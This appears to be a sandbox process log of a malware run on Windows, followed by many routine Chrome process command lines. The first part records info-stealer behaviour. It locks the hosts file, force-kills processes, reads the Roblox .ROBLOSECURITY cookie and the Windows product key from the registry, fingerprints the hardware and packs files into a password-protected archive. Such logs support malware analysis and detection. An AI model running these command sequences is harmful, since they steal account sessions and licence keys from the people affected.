C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\omjkrhd1\omjkrhd1.cmdline"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9EFA.tmp" "c:\Users\Admin\AppData\Local\Temp\omjkrhd1\CSC1968C0B59996411DA551B71CF87467.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 408"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 408
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 408"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1340"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 408
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1340
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1340"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1340
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1496"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1496"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1496
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1496
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1876"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1876"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1876
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1876
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4876"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4876"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4876
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4876
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2548"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2548"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2548
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2548
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3428"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3428"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3428
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3428
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3956"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3956"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3956
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3956
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35202\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\P2YCi.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI35202\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI35202\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\P2YCi.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffdcf30cc40,0x7ffdcf30cc4c,0x7ffdcf30cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1728,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1760 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2016,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2040 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1956 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3264,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3724,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4580 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4720,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3708,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4896,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4940,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4976 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5304,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5312 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5076,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5272 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4988,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5188 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5644,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5624 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5188,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5092 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4532,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5388 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5176,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3508 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3552,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5052 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=4540,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3332,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3388 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3376,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3368 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=4048,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4032 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=3408,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3360 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=4616,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3516 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=5052,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5784 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=5748,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4680 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=4564,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5580 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=4996,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5732 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=5936,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5948 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=5956,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5992 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=5976,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6228 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6444,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6416 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=6736,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6988 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=6096,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5980 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=6604,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6004 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=6624,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5960 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=6632,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5948 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=6636,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4636 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=6620,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7672 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=7100,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7772 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=6608,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7896 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=6904,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6700 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=5308,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8256 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=7284,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8284 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=7188,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6848 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=7172,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8424 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=6804,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8736 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=6788,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7600 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=7408,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8900 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=6748,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9020 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=7240,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9140 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=9396,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9388 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=7244,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9436 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
